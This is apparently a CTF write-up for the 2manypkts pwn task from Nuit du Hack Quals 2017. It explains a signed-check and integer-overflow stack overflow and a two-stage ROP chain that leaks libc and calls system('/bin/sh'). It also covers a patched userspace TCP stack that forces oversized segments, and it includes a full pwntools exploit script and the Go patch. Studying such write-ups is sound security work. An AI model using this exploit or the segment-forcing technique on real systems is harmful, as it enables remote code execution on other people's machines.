@WGH-
Last active April 4, 2017 18:54
2manypkts writeup (Nuit du Hack CTF Quals 2017)

The task is a remote x86_64 binary (both the binary and libc were provided), tagged "pwn" and "network". So the goal is to exploit some vulnerability to obtain a shell.

There are actually two parts to the task, named 2manypkts-v1 and 2manypkts-v2 respectively.

The binary has a fairly trivial stack buffer overflow vulnerability. In the first part, you can simply overflow the buffer up to (and beyond) the return address of main and use the well-known ROP technique. The second part is harder: main never returns, but the overflow can still overwrite other variables, including several pointers to heap buffers, which would allow calling realloc with arbitrary arguments. As we submitted the flag for the first part literally a minute before the end of the game, we didn't have time to solve the second part.

Why was the task tagged "network" as well, you might ask? The problem is that the buffer is rather large, about 57 kilobytes. The data is read into the buffer with a single read system call, and only after that is it moved to a different buffer. In other words, we have to fill the entire buffer (plus a ROP chain) in a single read call, which is obviously problematic over a network. The hint for the task stated that we should use some MTU and fragmentation tricks. Which we did, but it wasn't that simple.

Binary exploitation

The main loop of the binary lets the user input data of the following types: "double", "int", "char", "long", "unsigned long".

The user enters the data type first, then the number of elements as an integer (up to 14335 inclusive), and then the data itself in binary.

The program is written in C++ and, judging by the presence of strikingly similar functions, makes extensive use of C++ templates.

Here are the (reverse-engineered) definitions of our classes:

template <typename T>
class TypeContainer {
  int fd;
  int n_reads;
  T *buffer;
  T tmp_buffer[14336];
  size_t elems_in_tmp_buffer;
  size_t elems_in_buffer;
};
 
class State {
  int fd;
  int n_reads;
  TypeContainer<double> s1;
  TypeContainer<char> s2;
  TypeContainer<long> s3;
  TypeContainer<unsigned long> s4;
  TypeContainer<int> s5;
};

A variable of type State is allocated directly on the stack of the main function.
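To get a feel for the sizes involved, here is a minimal sketch that models TypeContainer<int> with ctypes. It assumes a typical 64-bit Linux ABI and that the compiler lays the members out exactly as in the reverse-engineered definition above; the class name IntContainer and the helper describe_layout are made up for this illustration and do not come from the binary.

```python
import ctypes

N_TMP = 14336  # capacity of tmp_buffer, taken from the class definition above


class IntContainer(ctypes.Structure):
    """Approximate model of TypeContainer<int> (an assumption, not the real ABI dump)."""
    _fields_ = [
        ("fd", ctypes.c_int),
        ("n_reads", ctypes.c_int),
        ("buffer", ctypes.c_void_p),
        ("tmp_buffer", ctypes.c_int * N_TMP),
        ("elems_in_tmp_buffer", ctypes.c_size_t),
        ("elems_in_buffer", ctypes.c_size_t),
    ]


def describe_layout():
    """Return (name, offset, size) for every member of the model."""
    rows = []
    for name, _ctype in IntContainer._fields_:
        field = getattr(IntContainer, name)
        rows.append((name, field.offset, field.size))
    return rows


if __name__ == "__main__":
    for name, offset, size in describe_layout():
        print("%-20s offset=%6d size=%6d" % (name, offset, size))
    print("sizeof(IntContainer) =", ctypes.sizeof(IntContainer))
```

Under these assumptions tmp_buffer occupies 14336 * 4 = 57344 bytes, and the two element counters sit directly behind it, so anything written past the end of tmp_buffer lands on them first.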

The logic of the program is as follows:

After the user gives the type and the number of elements, the program reads the data into tmp_buffer:

read(this->fd, this->tmp_buffer, nelems * sizeof(T));

The number of successfully read elements is then stored in the this->elems_in_tmp_buffer variable. After that, the elements are moved from the temporary buffer to the "persistent" one:

this->buffer = (T *)realloc(
  this->buffer,
  sizeof(T) * (this->elems_in_tmp_buffer + this->elems_in_buffer)
);

for (size_t i = 0; i < this->elems_in_tmp_buffer; ++i) {
  this->buffer[this->elems_in_buffer + i] = this->tmp_buffer[i];
}
this->elems_in_buffer += this->elems_in_tmp_buffer;

The vulnerability lies in the way nelems is handled.

First of all, the number is checked like this: nelems < 14336, where nelems is a signed integer, so any negative number passes the check. On its own, however, this is not enough: a negative number becomes a huge 64-bit unsigned integer, almost 2**64, and when such a size is passed to the read system call, it immediately fails with EFAULT. For the curious: smaller sizes, even 2**32, do not cause an immediate EFAULT and only fail once an actual attempt to write to an inaccessible page happens. You can find the exact reason in fs/read_write.c in the kernel source code; look for mentions of EFAULT.

Secondly, the number is susceptible to integer overflow. Remember that in the read argument, nelems is actually multiplied by sizeof(T)? If nelems is exactly INT_MIN+1 and, say, we're dealing with 4-byte integers, nelems * 4 will overflow and become just 4. Likewise, INT_MIN+100000 becomes 400000 after the multiplication.

This way, we can pass a negative number that passes the first check and becomes almost any number we want after the integer overflow in the calculation of the read argument.
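The arithmetic can be checked with a short Python model. This is only a sketch: it assumes that the multiplication wraps at 32 bits (which is what the numbers above imply), and the helper names passes_check, read_size and nelems_for are invented for the illustration.

```python
INT_MIN = -(2**31)
MAX_ELEMS = 14336  # the program accepts nelems < MAX_ELEMS


def passes_check(nelems):
    """Model of the signed comparison `nelems < 14336` on a 32-bit int."""
    return INT_MIN <= nelems < MAX_ELEMS


def read_size(nelems, type_size):
    """Byte count handed to read(), assuming a 32-bit wrapping multiply."""
    return (nelems * type_size) & 0xFFFFFFFF


def nelems_for(byte_count, type_size):
    """Pick a negative nelems whose wrapped product equals byte_count.

    The trick relies on INT_MIN * type_size wrapping to zero, which only
    holds for element sizes that are even (4 and 8 are handled here).
    """
    if type_size not in (4, 8):
        raise ValueError("only 4- and 8-byte element types are modelled")
    if byte_count % type_size:
        raise ValueError("byte_count must be a multiple of type_size")
    return INT_MIN + byte_count // type_size


if __name__ == "__main__":
    n = nelems_for(14336 * 4 + 64, 4)
    print(n, passes_check(n), read_size(n, 4))
```

Note that the same trick does not work for the "char" type under this model: with a 1-byte element there is no multiplication to wrap, so the size stays huge.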

The next steps are rather obvious. I decided to use two ROP chains. The first leaks the contents of a GOT entry, which defeats libc ASLR, and then jumps back to main. The second ROP chain simply calls system("/bin/sh"), whose address is known by then.
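The step from "leaked GOT entry" to "libc base" is a plain subtraction, sketched below. puts stops printing at the first NUL byte, and user-space addresses on x86_64 have their two top bytes zero, so only six bytes of the pointer typically come back. The function names and the numbers in the usage part are hypothetical values chosen for illustration; the real offset comes from the provided libc.

```python
import struct


def parse_leak(raw):
    """Turn the bytes printed by puts() into a 64-bit little-endian pointer."""
    if len(raw) > 8:
        raise ValueError("a pointer is at most 8 bytes long")
    # Pad the missing high bytes with zeros before unpacking.
    return struct.unpack("<Q", raw.ljust(8, b"\0"))[0]


def libc_base_from_leak(leaked_addr, symbol_offset):
    """Subtract the symbol's offset inside libc from its runtime address."""
    return leaked_addr - symbol_offset


if __name__ == "__main__":
    leaked = parse_leak(bytes.fromhex("90a6e7f7ff7f"))  # hypothetical leak
    base = libc_base_from_leak(leaked, 0x6F690)         # hypothetical offset of puts
    print(hex(leaked), hex(base))
```

A quick sanity check on the result is that the computed base should be page-aligned (its low 12 bits are zero); if it is not, the wrong libc or the wrong symbol was used.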

So far, so good.

Networking part

The exploit reliably works locally.

But note that our payload has to be slightly longer than 14336*sizeof(int) = 57344 bytes, since it also has to contain the comparatively small ROP chain.

When run over the network, read tends to return much smaller chunks of data than requested, so the buffer is not overflowed. This was expected, as the network stack is not going to wait until all the data has arrived.
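The short-read behaviour is easy to reproduce locally. The sketch below uses a local stream socket pair as a stand-in for the TCP connection (an assumption made to keep the example deterministic; it needs a Unix-like system): the receiver asks for 57344 bytes, but gets only what has already arrived. The function name short_read_demo is made up for the example.

```python
import socket


def short_read_demo(sent=1000, wanted=57344):
    """Send `sent` bytes, then ask for `wanted` bytes in a single recv().

    Returns the number of bytes the single recv() call actually delivered.
    """
    sender, receiver = socket.socketpair()
    try:
        sender.sendall(b"A" * sent)
        # Like read(2) on a socket, recv() returns as soon as some data is
        # available; it does not wait for the full requested amount.
        data = receiver.recv(wanted)
        return len(data)
    finally:
        sender.close()
        receiver.close()


if __name__ == "__main__":
    print("asked for 57344 bytes, got", short_read_demo())
```

Over a real network the same thing happens at the granularity of arriving TCP segments, which is why the payload has to arrive as one piece.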

As mentioned above, the provided hint advised messing with MTU and fragmentation.

We came up with this solution: we need to somehow craft a TCP segment large enough to hold our entire payload. A large TCP segment will be encapsulated in an equally large IP datagram, and such a large IP datagram is going to be fragmented (so that it can pass through a typical Ethernet link with an MTU of about 1500).

The bottom line is that the TCP/IP stack won't be able to process the TCP segment until the IP datagram has been reassembled entirely. This ensures that our whole payload arrives atomically. Although it doesn't guarantee a large atomic read per se, in practice this is exactly what happens (and what we want).
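As a rough sanity check of the plan, the sketch below estimates how many IPv4 fragments such a segment turns into. It assumes 20-byte IPv4 and TCP headers without options and a path MTU of 1500; the 57408-byte figure is the buffer (57344 bytes) plus the 64 bytes of overwritten fields and ROP chain sent by the exploit script. The function name fragment_count is invented for the example.

```python
IP_HEADER = 20       # IPv4 header without options (assumption)
TCP_HEADER = 20      # TCP header without options (assumption)
MAX_DATAGRAM = 65535  # largest possible IPv4 datagram


def fragment_count(tcp_payload, mtu=1500):
    """Estimate the number of IPv4 fragments for one TCP segment."""
    ip_payload = TCP_HEADER + tcp_payload
    if IP_HEADER + ip_payload > MAX_DATAGRAM:
        raise ValueError("segment does not fit into a single IPv4 datagram")
    # Every fragment except the last carries a multiple of 8 bytes.
    per_fragment = (mtu - IP_HEADER) // 8 * 8
    return (ip_payload + per_fragment - 1) // per_fragment


if __name__ == "__main__":
    print(fragment_count(14336 * 4 + 64))
```

The whole payload still fits into a single IPv4 datagram (the limit is 65535 bytes), which is what makes the trick possible at all; losing any one of the fragments means the entire segment has to be retransmitted.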

Now the question is, how do we make our TCP/IP stack behave that way? There's no way a typical unmodified Linux will assume that the MTU on the entire path is larger than 57000.

After some fruitless attempts at modifying the MTU (which didn't have much effect on segment size), we decided to find a userspace TCP/IP stack that we could easily modify. And we found one.

It's google/netstack, written in Go.

You create a TUN interface and set its IP address, MTU, owner, and other settings. I will assume that the interface is configured with the IPv4 address 10.1.1.1/24.

Then you can use the included program tun_tcp_connect as a netcat-like proxy.

# Usage: ./tun_tcp_connect <tun-device> <local-ipv4-address> <local-port> <remote-ipv4-address> <remote-port>
./tun_tcp_connect tun0 10.1.1.2 10000 163.172.102.12 30303

In this example, the program will assume the role of endpoint 10.1.1.2:10000 and will attempt to connect to 163.172.102.12:30303. The operating system will receive packets from 10.1.1.2 arriving on the interface with address 10.1.1.1/24 (which is not unlike what happens when you are connected to some physical network and other hosts try to use you as a router). All you need to do at this point is to enable routing from the tun0 interface to the public internet. As 10.1.1.0/24 is obviously a private network, you'll need NAT as well.

EXTERNAL=eth0
INTERNAL=tun0
 
iptables -P FORWARD ACCEPT # default ACCEPT for FORWARD chain
iptables -t nat -A POSTROUTING -o $EXTERNAL -j MASQUERADE
 
sysctl net.ipv4.conf.${EXTERNAL}.forwarding=1
sysctl net.ipv4.conf.${INTERNAL}.forwarding=1

Initially, I made a mistake and also included some connection tracking rules in the iptables ruleset (shown below). For unknown reasons, with these rules in place only IP datagrams up to 20000 bytes in size were passed. We wasted a lot of time debugging it. Leaving only the masquerade rule removed the weird limit.

iptables -P FORWARD DROP
iptables -A FORWARD -i $EXTERNAL -o $INTERNAL -m conntrack --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i $INTERNAL -o $EXTERNAL -j ACCEPT

To make google/netstack actually generate enormous TCP segments, we had to modify it a bit. The patch is rather trivial; it is attached below, after the exploit script.

#!/usr/bin/env python3
import socket
import subprocess
import time
import random

from pwn import *

BUFFER_SIZE = 14336

context.log_level = 'debug'


def attach_gdb():
    # Runs in the child process right before exec (see preexec_fn below).
    import os
    import signal
    import shlex

    gdb_commands = [
        "tcatch exec",
        "handle SIGSTOP nostop",
        "continue",
        "handle SIGSTOP stop",
        #"b realloc",
        #"b * 0x400E92",
        "continue",
    ]
    cmds = " ".join("-ex %s" % shlex.quote(c) for c in gdb_commands)
    #os.system("tmux split-window -h %s" % shlex.quote("gdb -p %d %s" % (os.getpid(), cmds)))
    return  # debugging is disabled; remove this line to attach gdb
    os.system("urxvtc -e gdb -p %d %s" % (os.getpid(), cmds))
    os.kill(os.getpid(), signal.SIGSTOP)


LOCAL = 1
if LOCAL:
    libc = ELF("/lib64/libc.so.6")
    p = process("./2manypkts", preexec_fn=attach_gdb)
else:
    libc = ELF("libc.so.6")
    # Talk to the remote service through the patched userspace TCP/IP stack.
    p = process(
        ["/home/wgh/go/bin/tun_tcp_connect", "lol0",
         "10.1.1.%d" % random.randint(2, 254), "11111",
         "163.172.102.12", "30303"],
        stderr=subprocess.DEVNULL,
    )

bin_sh_offset = next(libc.search(b"/bin/sh\0"))

# double-sized (8 bytes)
EXTRA_ELEMENTS = 1


def compute_overflow_size(size, type_size):
    # Negative element count that passes the "< 14336" check and turns
    # into `size` bytes after the overflowing multiplication.
    INT_MIN = -(2**31)
    return INT_MIN + size // type_size


def get_rop_chain1():
    # Stage 1: print the contents of a GOT entry, then return to main.
    chain = b""
    chain += p64(0x0000000000403663)  # pop rdi, ret
    chain += p64(0x605048)  # GOT entry to leak (puts)
    chain += p64(0x400C10)  # puts
    chain += p64(0x400E36)  # main
    return chain


def get_rop_chain2(base):
    # Stage 2: system("/bin/sh") using the leaked libc base.
    chain = b""
    chain += p64(0x0000000000403663)  # pop rdi, ret
    chain += p64(base + bin_sh_offset)  # string addr
    chain += p64(base + libc.symbols['system'])  # system
    chain += p64(0x400E36)  # main
    return chain


chain1 = get_rop_chain1()
time.sleep(1)

p.sendline("int")
p.recvuntil("enter into int")
p.sendline("%d" % compute_overflow_size(14336*4 + 8+8 + 8+8+len(chain1), 4))
p.recvuntil("size :")
# The whole payload must arrive in a single read().
p.send(b"A"*(14336*4) + p64(0) + p64(0) + p64(0) + p64(0xdeadbeef) + chain1)
p.recvuntil("End data dump")
p.sendline("exit")
p.recvuntil("Exiting now!\n")

# puts stops at the first NUL byte, so only 6 bytes of the pointer come back.
leaked_puts = u64(p.recv(6) + b'\0\0')
libc_base = leaked_puts - libc.symbols['puts']
log.info("Leaked puts: %016x", leaked_puts)
log.info("Libc base: %016x", libc_base)

chain2 = get_rop_chain2(libc_base)

p.sendline("int")
p.recvuntil("enter into int")
p.sendline("%d" % compute_overflow_size(14336*4 + 8+8 + 8+8+len(chain2), 4))
p.recvuntil("size :")
p.send(b"A"*(14336*4) + p64(0) + p64(0) + p64(0) + p64(0xdeadbeef) + chain2)
p.recvuntil("End data dump")
p.sendline("exit")
p.recvuntil("Exiting now!\n")

p.interactive()

diff --git a/tcpip/sample/tun_tcp_connect/main.go b/tcpip/sample/tun_tcp_connect/main.go
index ddd08da..3366ef5 100644
--- a/tcpip/sample/tun_tcp_connect/main.go
+++ b/tcpip/sample/tun_tcp_connect/main.go
@@ -60,7 +60,7 @@ func writer(ch chan struct{}, ep tcpip.Endpoint) {
 
 	r := bufio.NewReader(os.Stdin)
 	for {
-		v := buffer.NewView(1024)
+		v := buffer.NewView(102400)
 		n, err := r.Read(v)
 		if err != nil {
 			return
diff --git a/tcpip/transport/tcp/connect.go b/tcpip/transport/tcp/connect.go
index 3871ec2..0a0986b 100644
--- a/tcpip/transport/tcp/connect.go
+++ b/tcpip/transport/tcp/connect.go
@@ -5,6 +5,8 @@
 package tcp
 
 import (
+	"os"
+	"fmt"
 	"crypto/rand"
 	"time"
 
@@ -384,12 +386,17 @@ func parseSynOptions(s *segment) (mss uint16, ws int, ok bool) {
 		}
 	}
 
+	fmt.Fprintf(os.Stderr, "Overriding MSS %v\n", mss)
+
+	mss = 65000
+
 	return mss, ws, true
 }
 
 func sendSynTCP(r *stack.Route, id stack.TransportEndpointID, flags byte, seq, ack seqnum.Value, rcvWnd seqnum.Size, rcvWndScale int) error {
 	// Initialize the options.
 	mss := r.MTU() - header.TCPMinimumSize
+	mss = 65000
 	options := []byte{
 		// Initialize the MSS option.
 		header.TCPOptionMSS, 4, byte(mss >> 8), byte(mss),
diff --git a/tcpip/transport/tcp/snd.go b/tcpip/transport/tcp/snd.go
index f9b6427..6dfcb95 100644
--- a/tcpip/transport/tcp/snd.go
+++ b/tcpip/transport/tcp/snd.go
@@ -284,7 +284,7 @@ func (s *sender) sendData() {
 	// into one segment if they happen to fit. We should do that
 	// eventually.
 	var seg *segment
-	end := s.sndUna.Add(s.sndWnd)
+	end := s.sndUna.Add(s.sndWnd).Add(0x40000)
 	for seg = s.writeNext; seg != nil && s.outstanding < s.sndCwnd; seg = seg.Next() {
 		// We abuse the flags field to determine if we have already
 		// assigned a sequence number to this segment.